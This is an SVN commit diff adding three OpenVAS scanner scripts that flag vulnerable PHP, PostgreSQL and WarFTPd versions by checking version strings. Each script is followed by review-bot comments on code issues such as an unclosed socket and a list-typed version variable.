+http://securityreason.com/securityalert/6600
+http://www.php.net
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if php version is 5.3.0 or 5.2.11");
+ script_category(ACT_GATHER_INFO);
+ script_family("Web application abuses");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("gb_php_detect.nasl");
+ script_require_ports("Services/www", 80);
+ exit(0);
+}
+
+include("version_func.inc");
+
+phpPort = get_kb_item("Services/www");
+if(!phpPort){
+  exit(0);
+}
+
+phpVer = get_kb_item("www/" + phpPort + "/PHP");
+if(!phpVer){
+  exit(0);
+}
+
+if(version_is_equal(version:phpVer, test_version:"5.2.11") ||
+   version_is_equal(version:phpVer, test_version:"5.3.0")) {
+
+   security_warning(port:phpPort);
+   exit(0);
+}
+
+exit(0);
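Review bot: The port is taken with `phpPort = get_kb_item("Services/www")` while every other web check in this commit uses `port = get_http_port(default:80)` from http_func.inc followed by `get_port_state(port)`; this script skips the port-state test and has no fallback when no www service is registered, for no visible reason. `include("http_func.inc"); phpPort = get_http_port(default:80); if(!get_port_state(phpPort)) exit(0);` makes it consistent with its siblings. The KB key `"www/" + phpPort + "/PHP"` is written by gb_php_detect.nasl, which is not visible here, so confirm the key form against that script.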


Property changes on: trunk/openvas-plugins/scripts/php_restriction_bypass.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl
===================================================================
--- trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,93 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PostgreSQL Multiple Security Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100273);
+ script_bugtraq_id(36314);
+ script_cve_id("CVE-2009-3229","CVE-2009-3230","CVE-2009-3231");
+ script_version ("1.0-$Revision$");
+
+ script_name("PostgreSQL Multiple Security Vulnerabilities");
+
+desc = "Overview:
+PostgreSQL is prone to multiple security vulnerabilities, including a
+denial-of-service issue, a privilege-escalation issue, and an authentication-
+bypass issue.
+
+Attackers can exploit these issues to shut down affected servers,
+perform certain actions with elevated privileges, and bypass
+authentication mechanisms to perform unauthorized actions. Other
+attacks may also be possible.
+
+
+Solution:
+Updates are available. Please see the references for more information.
+
+
+References:
+http://www.securityfocus.com/bid/36314
+https://bugzilla.redhat.com/show_bug.cgi?id=522085#c1
+http://www.postgresql.org/
+http://www.postgresql.org/support/security
+http://permalink.gmane.org/gmane.comp.security.oss.general/2088
+
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if PostgreSQL is prone to multiple security vulnerabilities");
+ script_category(ACT_GATHER_INFO);
+ script_family("Databases");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("postgresql_detect.nasl");
+ script_require_ports("Services/postgresql", 5432);
+ exit(0);
+}
+
+include("misc_func.inc");
+include("version_func.inc");
+
+port = get_kb_item("Services/postgresql");
+if(!port)port = 5432;
+if(!get_tcp_port_state(port))exit(0);
+
+if(!ver = get_kb_list(string("PostgreSQL/Remote/", port, "/Ver")))exit(0);
+
+if(
+    version_in_range(version:ver, test_version:"8.4", test_version2:"8.4.0")  ||
+    version_in_range(version:ver, test_version:"8.3", test_version2:"8.3.7")  ||
+    version_in_range(version:ver, test_version:"8.2", test_version2:"8.2.13") ||
+    version_in_range(version:ver, test_version:"8.1", test_version2:"8.1.17") ||
+    version_in_range(version:ver, test_version:"8.0", test_version2:"8.0.21") ||
+    version_in_range(version:ver, test_version:"7.4", test_version2:"7.4.25") 
+  )
+{
+     security_warning(port:port);
+     exit(0);
+}
+
+exit(0);
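Review bot: `ver` on the line `if(!ver = get_kb_list(string("PostgreSQL/Remote/", port, "/Ver")))exit(0);` is a list, not a single string, so when the detect script has recorded more than one version entry for this port the `version_in_range()` calls receive the whole list instead of one version; either read one value with `get_kb_item()` as the port lookup above does, or iterate with `foreach v (ver)` and test each entry. The check is purely version-string based, so builds carrying backported fixes (the Red Hat bugzilla entry in the references points at such a case) keep the old version and will be reported as vulnerable; a sentence in the description saying the result is based on the version reported by the server would save analysts a false-positive chase. The ranges are anchored on the last affected release of each branch, which is fine, but a 7.3 or older server silently passes even though the description gives no lower bound — worth either adding a range for it or stating the limitation in the description.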


Property changes on: trunk/openvas-plugins/scripts/postgreSQL_multiple_security_vulnerabilities.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision

Added: trunk/openvas-plugins/scripts/warftpd_20944.nasl
===================================================================
--- trunk/openvas-plugins/scripts/warftpd_20944.nasl	2009-10-01 10:15:29 UTC (rev 5348)
+++ trunk/openvas-plugins/scripts/warftpd_20944.nasl	2009-10-01 16:57:31 UTC (rev 5349)
@@ -0,0 +1,99 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# WarFTPD Multiple Format String Vulnerabilities
+#
+# Authors:
+# Michael Meyer
+#
+# Copyright:
+# Copyright (c) 2009 Greenbone Networks GmbH
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if (description)
+{
+ script_id(100282);
+ script_bugtraq_id(20944);
+ script_cve_id("CVE-2006-5789");
+ script_version ("1.0-$Revision$");
+
+ script_name("WarFTPD Multiple Format String Vulnerabilities");
+
+desc = "Overview:
+WarFTPd is prone to multiple remote format-string vulnerabilities
+because the application fails to sanitize user-supplied input before
+passing it to a formatted-output function.
+
+An attacker can exploit these issues to crash the server and possibly
+to execute arbitrary code within the context of the server, but this
+has not been confirmed.
+
+WarFTPd 1.82.00-RC11 is reported vulnerable; prior versions may be
+vulnerable as well.
+
+Solution:
+Updates are available. Please see the references for details.
+
+References:
+http://www.securityfocus.com/bid/20944
+http://support.jgaa.com/index.php?MenuPage=product
+http://www.securityfocus.com/archive/1/506443
+http://www.securityfocus.com/archive/1/450804
+
+
+Risk factor : Medium";
+
+ script_description(desc);
+ script_summary("Determine if WarFTPd version is WarFTPd 1.82.00-RC11");
+ script_category(ACT_GATHER_INFO);
+ script_family("FTP");
+ script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
+ script_dependencies("find_service.nes","secpod_ftp_anonymous.nasl","ftpserver_detect_type_nd_version.nasl");
+ script_require_ports("Services/ftp", 21);
+ exit(0);
+}
+
+include("ftp_func.inc");
+include("version_func.inc");
+
+port = get_kb_item("Services/ftp");
+if(!port){
+  port = 21;
+}
+
+if(get_kb_item('ftp/'+port+'/broken'))exit(0);
+
+if(!get_port_state(port)){
+  exit(0);
+}
+
+soc = open_sock_tcp(port);
+if(!soc)exit(0);
+
+banner =  ftp_recv_line(socket:soc);
+if(!banner)exit(0);
+
+if(!version = eregmatch(string: banner, pattern:"WarFTPd ([0-9.]+[-RC0-9]*)"))exit(0);
+version[1] = ereg_replace(pattern:"-", string:version[1], replace:".");
+
+if(version_is_equal(version: version[1], test_version:"1.82.00.RC11") ||
+   version_is_equal(version: version[1], test_version:"1.82.00.RC12")) {	
+      security_warning(port:port);
+      exit(0);
+}
+
+exit(0);
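Review bot: The socket opened with `soc = open_sock_tcp(port);` is never closed on any path — the banner read, the `eregmatch` miss and both `exit(0)` calls all leave it open; add `close(soc);` directly after `banner =  ftp_recv_line(socket:soc);` since nothing is sent afterwards. The description and the summary name only 1.82.00-RC11 as vulnerable, yet the check also flags 1.82.00-RC12, so the overview text should list RC12 too (or the extra comparison should go) to keep report text and detection logic consistent. The description also says prior versions may be vulnerable, but the two `version_is_equal` tests mean every other build silently passes; if that is deliberate, a comment such as `# only RC11/RC12 are known-affected; older builds are not flagged` would make the decision visible to the next maintainer.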


Property changes on: trunk/openvas-plugins/scripts/warftpd_20944.nasl
___________________________________________________________________
Name: svn:keywords
   + Id Revision


